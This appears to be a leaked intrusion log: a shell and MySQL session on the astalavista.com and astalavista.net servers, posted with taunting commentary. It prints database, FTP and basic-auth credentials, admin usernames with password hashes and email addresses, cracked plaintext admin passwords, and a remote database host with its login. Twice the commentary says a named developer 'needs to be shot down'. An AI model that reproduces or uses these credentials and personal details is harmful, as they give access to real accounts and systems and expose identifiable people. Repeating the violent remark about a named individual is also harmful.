4096 Mar 28 21:17 cadmin drwxrwxrwx 2 com com 4096 May 19 00:50 config drwxr-xr-x 2 com com 4096 Mar 20 11:05 core drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__ -rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess -rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04- 21.bak -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05- 11.bak drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool drwxrwxrwx 14 com com 4096 Feb 2 19:29 images -rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib drwxrwxrwx 12 com com 4096 Jun 2 07:47 media drwxr-xr-x 8 com com 4096 May 11 12:48 modifications drwxr-xr-x 34 com com 4096 May 28 16:30 modules drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin drwxrwxr-x 22 com com 4096 May 28 17:06 _new drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy -rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml -rw-r--r-- 1 com com 223 Mar 30 15:32 test.php drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam sh-3.2$ head -20 index.php <?php /** * The main page for the CMS * @copyright CONTREXX CMS - COMVATION AG * @author Comvation Development Team * @version v1.0.9.10.1 stable * @package contrexx * @subpackage core * @link http://www.contrexx.com/ contrexx homepage * @since v0.0.0.0 * @todo Capitalize all class names in project * @uses /config/configuration.php * @uses /config/settings.php * @uses /config/version.php * @uses /core/API.php * @uses /core_modules/cache/index.class.php * @uses /core/error.class.php * @uses /core_modules/banner/index.class.php * @uses /core_modules/contact/index.class.php sh-3.2$ cd config/ sh-3.2$ ls -la total 32 drwxrwxrwx 2 com com 4096 May 19 00:50 . drwxr-xr-x 30 com apache 4096 May 28 17:06 .. -rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php -rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php sh-3.2$ cat configuration.php [snip] $_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix $_DBCONFIG['user'] = 'contrexxuser2'; // Database username $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..) $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..) [snip] $_FTPCONFIG['is_activated'] = true; // Ftp support true or false $_FTPCONFIG['use_passive'] = true; // Use passive ftp mode $_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost $_FTPCONFIG['port'] = 21; // Ftp remote port $_FTPCONFIG['username'] = 'dev at astalavista.com'; // Ftp login username $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password $_FTPCONFIG['path'] = '/'; // Ftp path to cms sh-3.2$ cd .. sh-3.2$ cd dvd/ sh-3.2$ ls -la total 2913780 drwxr-xr-x 2 com com 4096 Sep 9 2008 . drwxr-xr-x 30 com apache 4096 May 28 17:06 .. -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar -rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess sh-3.2$ cat .htaccess authType Basic authName DVD authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd require valid-user sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd DVDdownload:CRD8cuY6.MPT6 DVDdownload2:CR8a36.wluFMg sh-3.2$ cat test.php <?php $url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc 0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D'; $url = str_replace(array('&', '&'), '&', base64_decode(rawurldecode($url))); echo $url; ?> sh-3.2$ cd modifications/ sh-3.2$ ls -la total 32 drwxr-xr-x 8 com com 4096 May 11 12:48 . drwxr-xr-x 30 com apache 4096 May 28 17:06 .. drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc drwxr-xr-x 2 com com 4096 Feb 2 19:33 search drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp sh-3.2$ ls -R .: com_avtng cronjobs onlinetools pjirc search _tmp ./com_avtng: avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts ./com_avtng/scripts: popunder.js ./cronjobs: exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp ./cronjobs/tmp: contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv ./onlinetools: index.php ./pjirc: a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc- unsigned.cab thanks.txt AppletWithJS.html french.lng IRCApplet.class irc- unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd ./pjirc/img: ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere- noel.gif pouce-non.gif sleep.gif verre-eau.gif argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif verre-vin.gif ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif ./pjirc/snd: bell2.au ding.au ./search: searchEngines.php search.php ./_tmp: defaultPorts.php defaultPorts.txt sh-3.2$ cd cronjobs/ sh-3.2$ cat exploits.php [snip] $categories = array(); $milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt'; $expolits = file($milw0rmFile); $comExploits = array(); [snip] // manage data for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640 // get path and title $expolits[$x] = trim($expolits[$x]); $path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' '))); $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES); // check if file exists if (file_exists($path)) { $text = file_get_contents($path); // get content and date //$text = htmlspecialchars($text, ENT_QUOTES); $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF- 8")); if ($tmptext != '') { $text = $tmptext; } else { $text = addslashes(htmlentities($text, ENT_QUOTES)); } $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com ['))); $tmp = explode('-', $date); $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0])); $cat = getCategory ($path); $ext = pathinfo(basename($path)); $ext = $ext['extension']; $qStr = " SELECT `id` FROM `contrexx_module_exploits` WHERE `title` = '" . $title . "' AND `date` = '" . $date . "' "; echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n"; $q = $_objDB->query($qStr); if ($q->numRows() == 0) { // prepare array $comExploits[$x]['date'] = $date; $comExploits[$x]['title'] = $title; $comExploits[$x]['author'] = 'milw0rm'; $comExploits[$x]['text'] = $text; $comExploits[$x]['source'] = $ext; $comExploits[$x]['url1'] = ''; $comExploits[$x]['url2'] = ''; $comExploits[$x]['catid'] = $cat; $comExploits[$x]['lang'] = '2'; $comExploits[$x]['userid'] = '12'; $comExploits[$x]['startdate'] = '0000-00-00'; $comExploits[$x]['enddate'] = '0000-00-00'; $comExploits[$x]['status'] = '1'; $comExploits[$x]['changelog'] = $date; } [snip] $xml = '<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0"> <channel> <title>ASTALAVISTA.com - Exploits http://www.astalavista.com/exploits All availably Exploits. en-us ' . date('F, j M Y H:i:s O') . ' http://blogs.law.harvard.edu/tech/rss Astalavista.com info at astalavista.com' . $items . ' '; if (file_exists(FULLPATH . '/feed/exploits.xml')) { unlink (FULLPATH . '/feed/exploits.xml'); } file_put_contents(FULLPATH . '/feed/exploits.xml', $xml); [snip] sh-3.2$ cat exploits.sh #!/bin/sh ########################################################### # # # Title: milw0rm exploits adder # # Description: Add all milw0rm exploits to the # # Astalavista.com database # # # # Company: Astalavista Group # # Author: Paulo M. Santos # # E-Mail: paulo.santos at astalavista.ch # # # ########################################################### # path this_path=/home/com/public_html/modifications/cronjobs # change directory cd $this_path cd tmp/ # delete files rm -rf milw0rm.tar.* & rm -rf milw0rm/ & # wget milw0rm paket wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2 # extract milw0rm paket tar -xvf milw0rm.tar.bz2 # change owner chown -R com . chgrp -R com . # execute php script cd $this_path php -q exploits.php # delete files rm -rf tmp/milw0rm.tar.* rm -rf tmp/milw0rm/ sh-3.2$ echo "Paulo M. Santos needs to be shot down." Paulo M. Santos needs to be shot down. mysql -u contrexxuser2 -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 261694 Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | com_contrexx2 | | com_contrexx2_live | | test | +--------------------+ 4 rows in set (0.00 sec) mysql> use com_contrexx2_live Database changed mysql> show tables; +--------------------------------------------------+ | Tables_in_com_contrexx2_live | +--------------------------------------------------+ | cc_banner_counter | | cc_search_counter | | contrexx_access_group_dynamic_ids | | contrexx_access_group_static_ids | | contrexx_access_rel_user_group | | contrexx_access_settings | | contrexx_access_user_attribute | | contrexx_access_user_attribute_name | | contrexx_access_user_attribute_value | | contrexx_access_user_core_attribute | | contrexx_access_user_groups | | contrexx_access_user_mail | | contrexx_access_user_profile | | contrexx_access_user_title | | contrexx_access_user_validity | | contrexx_access_users | | contrexx_backend_areas | | contrexx_backups | | contrexx_content | | contrexx_content_history | | contrexx_content_logfile | | contrexx_content_navigation | | contrexx_content_navigation_history | | contrexx_ids | | contrexx_languages | | contrexx_lib_country | | contrexx_log | | contrexx_module_alias_source | | contrexx_module_alias_target | | contrexx_module_block_blocks | | contrexx_module_block_rel_lang | | contrexx_module_block_rel_pages | | contrexx_module_block_settings | | contrexx_module_blog_categories | | contrexx_module_blog_comments | | contrexx_module_blog_message_to_category | | contrexx_module_blog_messages | | contrexx_module_blog_messages_lang | | contrexx_module_blog_networks | | contrexx_module_blog_networks_lang | | contrexx_module_blog_settings | | contrexx_module_blog_votes | | contrexx_module_calendar | | contrexx_module_calendar_access | | contrexx_module_calendar_categories | | contrexx_module_calendar_form_data | | contrexx_module_calendar_form_fields | | contrexx_module_calendar_registrations | | contrexx_module_calendar_settings | | contrexx_module_calendar_style | | contrexx_module_contact_form | | contrexx_module_contact_form_data | | contrexx_module_contact_form_field | | contrexx_module_contact_settings | | contrexx_module_data_categories | | contrexx_module_data_message_to_category | | contrexx_module_data_messages | | contrexx_module_data_messages_lang | | contrexx_module_data_placeholders | | contrexx_module_data_settings | | contrexx_module_directory_access | | contrexx_module_directory_categories | | contrexx_module_directory_dir | | contrexx_module_directory_inputfields | | contrexx_module_directory_levels | | contrexx_module_directory_mail | | contrexx_module_directory_rel_dir_cat | | contrexx_module_directory_rel_dir_level | | contrexx_module_directory_settings | | contrexx_module_directory_settings_google | | contrexx_module_directory_vote | | contrexx_module_docsys | | contrexx_module_docsys_categories | | contrexx_module_egov_configuration | | contrexx_module_egov_orders | | contrexx_module_egov_product_calendar | | contrexx_module_egov_product_fields | | contrexx_module_egov_products | | contrexx_module_egov_settings | | contrexx_module_exploits | | contrexx_module_exploits_categories | | contrexx_module_feed_category | | contrexx_module_feed_news | | contrexx_module_feed_newsml_association | | contrexx_module_feed_newsml_categories | | contrexx_module_feed_newsml_documents | | contrexx_module_feed_newsml_providers | | contrexx_module_forum_access | | contrexx_module_forum_categories | | contrexx_module_forum_categories_lang | | contrexx_module_forum_notification | | contrexx_module_forum_postings | | contrexx_module_forum_rating | | contrexx_module_forum_settings | | contrexx_module_forum_statistics | | contrexx_module_gallery_categories | | contrexx_module_gallery_comments | | contrexx_module_gallery_language | | contrexx_module_gallery_language_pics | | contrexx_module_gallery_pictures | | contrexx_module_gallery_settings | | contrexx_module_gallery_votes | | contrexx_module_guestbook | | contrexx_module_guestbook_settings | | contrexx_module_livecam | | contrexx_module_livecam_settings | | contrexx_module_market | | contrexx_module_market_access | | contrexx_module_market_categories | | contrexx_module_market_mail | | contrexx_module_market_paypal | | contrexx_module_market_settings | | contrexx_module_market_spez_fields | | contrexx_module_mediadir_access | | contrexx_module_mediadir_categories | | contrexx_module_mediadir_comments | | contrexx_module_mediadir_dir | | contrexx_module_mediadir_inputfields | | contrexx_module_mediadir_levels | | contrexx_module_mediadir_mail | | contrexx_module_mediadir_rel_dir_cat | | contrexx_module_mediadir_rel_dir_level | | contrexx_module_mediadir_reports | | contrexx_module_mediadir_settings | | contrexx_module_mediadir_settings_google | | contrexx_module_mediadir_vote | | contrexx_module_memberdir_directories | | contrexx_module_memberdir_name | | contrexx_module_memberdir_settings | | contrexx_module_memberdir_values | | contrexx_module_nettools_allowed_groups | | contrexx_module_nettools_settings | | contrexx_module_news | | contrexx_module_news_access | | contrexx_module_news_categories | | contrexx_module_news_settings | | contrexx_module_news_teaser_frame | | contrexx_module_news_teaser_frame_templates | | contrexx_module_news_ticker | | contrexx_module_newsletter | | contrexx_module_newsletter_attachment | | contrexx_module_newsletter_category | | contrexx_module_newsletter_confirm_mail | | contrexx_module_newsletter_rel_cat_news | | contrexx_module_newsletter_rel_user_cat | | contrexx_module_newsletter_settings | | contrexx_module_newsletter_template | | contrexx_module_newsletter_tmp_sending | | contrexx_module_newsletter_user | | contrexx_module_newsletter_user_title | | contrexx_module_onlinetools_defaultports | | contrexx_module_onlinetools_defaultports_back | | contrexx_module_onlinetools_geolitecity_blocks | | contrexx_module_onlinetools_geolitecity_country | | contrexx_module_onlinetools_geolitecity_location | | contrexx_module_podcast_category | | contrexx_module_podcast_medium | | contrexx_module_podcast_rel_category_lang | | contrexx_module_podcast_rel_medium_category | | contrexx_module_podcast_settings | | contrexx_module_podcast_template | | contrexx_module_proxydb | | contrexx_module_recommend | | contrexx_module_repository | | contrexx_module_securitynews_cats | | contrexx_module_securitynews_feeds | | contrexx_module_securitynews_news | | contrexx_module_shop_categories | | contrexx_module_shop_config | | contrexx_module_shop_countries | | contrexx_module_shop_currencies | | contrexx_module_shop_customers | | contrexx_module_shop_importimg | | contrexx_module_shop_lsv | | contrexx_module_shop_mail | | contrexx_module_shop_mail_content | | contrexx_module_shop_manufacturer | | contrexx_module_shop_order_items | | contrexx_module_shop_order_items_attributes | | contrexx_module_shop_orders | | contrexx_module_shop_payment | | contrexx_module_shop_payment_processors | | contrexx_module_shop_pricelists | | contrexx_module_shop_products | | contrexx_module_shop_products_attributes | | contrexx_module_shop_products_attributes_name | | contrexx_module_shop_products_attributes_value | | contrexx_module_shop_products_downloads | | contrexx_module_shop_rel_countries | | contrexx_module_shop_rel_payment | | contrexx_module_shop_rel_shipment | | contrexx_module_shop_shipment_cost | | contrexx_module_shop_shipper | | contrexx_module_shop_vat | | contrexx_module_shop_zones | | contrexx_module_u2u_address_list | | contrexx_module_u2u_message_log | | contrexx_module_u2u_sent_messages | | contrexx_module_u2u_settings | | contrexx_module_u2u_user_log | | contrexx_modules | | contrexx_sessions | | contrexx_settings | | contrexx_settings_smtp | | contrexx_skins | | contrexx_stats_browser | | contrexx_stats_colourdepth | | contrexx_stats_config | | contrexx_stats_country | | contrexx_stats_hostname | | contrexx_stats_javascript | | contrexx_stats_operatingsystem | | contrexx_stats_referer | | contrexx_stats_requests | | contrexx_stats_requests_summary | | contrexx_stats_screenresolution | | contrexx_stats_search | | contrexx_stats_spiders | | contrexx_stats_spiders_summary | | contrexx_stats_visitors | | contrexx_stats_visitors_summary | | contrexx_voting_additionaldata | | contrexx_voting_email | | contrexx_voting_rel_email_system | | contrexx_voting_results | | contrexx_voting_system | | foo | +--------------------------------------------------+ 227 rows in set (0.01 sec) mysql> select count(*) as skids from contrexx_access_users; +-------+ | skids | +-------+ | 53699 | +-------+ 1 row in set (0.00 sec) mysql> describe contrexx_access_users; +------------------+------------------------------------------+----- -+-----+--------------+----------------+ | Field | Type | Null | Key | Default | Extra | +------------------+------------------------------------------+----- -+-----+--------------+----------------+ | id | int(10) unsigned | NO | PRI | NULL | auto_increment | | is_admin | tinyint(1) unsigned | NO | | 0 | | | username | varchar(40) | YES | MUL | NULL | | | password | varchar(32) | YES | | NULL | | | regdate | int(14) unsigned | NO | | 0 | | | expiration | int(14) unsigned | NO | | 0 | | | validity | int(10) unsigned | NO | | 0 | | | last_auth | int(14) unsigned | NO | | 0 | | | last_activity | int(14) unsigned | NO | | 0 | | | email | varchar(255) | YES | | NULL | | | email_access | enum('everyone','members_only','nobody') | NO | | nobody | | | frontend_lang_id | int(2) unsigned | NO | | 0 | | | backend_lang_id | int(2) unsigned | NO | | 0 | | | active | tinyint(1) | NO | | 0 | | | profile_access | enum('everyone','members_only','nobody') | NO | | members_only | | | restore_key | varchar(32) | NO | | | | | restore_key_time | int(14) unsigned | NO | | 0 | | | u2u_active | enum('0','1') | NO | | 1 | | +------------------+------------------------------------------+----- -+-----+--------------+----------------+ 18 rows in set (0.00 sec) mysql> select username,password,email from contrexx_access_users where is_admin = 1; +------------+----------------------------------+------------------- ----------+ | username | password | email | +------------+----------------------------------+------------------- ----------+ | system | 0defe9e458e745625fffbc215d7801c5 | info at comvation.com | | prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac at astalavista.com | | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos at astalavista.ch | | schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid at comvation.com | +------------+----------------------------------+------------------- ----------+ 4 rows in set (0.04 sec) mysql> exit; Bye [~] There you go, your "team of security and IT professionals" is a joke. +------------------------------+ system:f82BN3+_* Be1er0ph0r:belerophor4astacom prozac:asta4cms! commander:mpbdaagf6m sykadul:ak29eral +------------------------------+ [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s) ...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it. [~] Lets move to astalavista.net now, >From : >> Everyone knows that the best defense is a good offense. >> Those who wait for their foes to find a security loophole are opting for the wrong strategy. >> The ASTALAVISTA hacking & security community is the largest IT security community in the world. >> It?s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking." >> Go ahead, try and hack our server ? in a completely legal way! >> Learn by doing: We offer our members tricky tasks and challenges on an >> ongoing basis so you can test your knowledge and abilities. You can also >> demonstrate what you?ve mastered by taking part in regular hacker contests >> and war games [~] Lets take a look there, after all... they are hack-proof, aren't they?! [-] Tricky task: Find home dir of astalavista.net sh-3.2$ ls -la ~astanet total 48 drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 . drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/ sh-3.2$ ls -la total 200 drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 . drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 .. drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007 drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet at astalavista.com drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner -rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd -rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour -rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess -rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html -rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php -rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki sh-3.2$ head -20 index.php * @version 1.0 */ if ($_SERVER['PHP_SELF'] == '/webcash.php') { $dontStartSession = false; } else { $dontStartSession = true; } require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php'); require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php'); require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.cl ass.php'); require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.cl ass.php'); sh-3.2$ cd config sh-3.2$ ls -la total 32 drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .. -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php -rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php -rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php -rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php sh-3.2$ cat com.conf.php [snip] //member-database $_CONFIG['db_mem_server'] = 'localhost'; $_CONFIG['db_mem_database'] = 'astanet_membersystem'; $_CONFIG['db_mem_user'] = 'astanet_db'; $_CONFIG['db_mem_password'] = 'TXwVrC7hbq'; $_CONFIG['db_mem_debug'] = false; //true or false //ads-database $_CONFIG['db_ads_server'] = 'localhost'; $_CONFIG['db_ads_database'] = 'astanet_ads'; $_CONFIG['db_ads_user'] = 'astanet_db'; $_CONFIG['db_ads_password'] = 'TXwVrC7hbq'; $_CONFIG['db_ads_debug'] = false; //true or false //rainbow-database $_CONFIG['db_rainbow_server'] = '212.254.194.163'; $_CONFIG['db_rainbow_database'] = 'rainbow'; $_CONFIG['db_rainbow_user'] = 'dinu'; $_CONFIG['db_rainbow_password'] = 'dinudinu'; $_CONFIG['db_rainbow_debug'] = false; //true or false //mailing lists database $_CONFIG['db_mailing_lists_server'] = 'localhost'; $_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists'; $_CONFIG['db_mailing_lists_user'] = 'astanet_db'; $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq'; $_CONFIG['db_mailing_lists_debug'] = false; //true or false //paypal $_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi- bin/webscr'; $_CONFIG['sub_pp_cmd'] = '_xclick'; $_CONFIG['sub_pp_business'] = 'info at astalavista.net'; $_CONFIG['sub_pp_noship'] = '1'; $_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/'; [snip] sh-3.2$ cd .. sh-3.2$ cd member sh-3.2$ ls -la total 20 drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .. -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess -rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php sh-3.2$ cat .htaccess SecFilterEngine off sh-3.2$ cd .. sh-3.2$ cd cron sh-3.2$ ls -la total 168 drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .. -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php -rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php -rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php -rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php -rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php -rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php -rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php -rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php -rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php sh-3.2$ cd .. sh-3.2$ cd _007 sh-3.2$ ls -la total 24 drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .. -rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php -rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php drwxr-xr-x 5 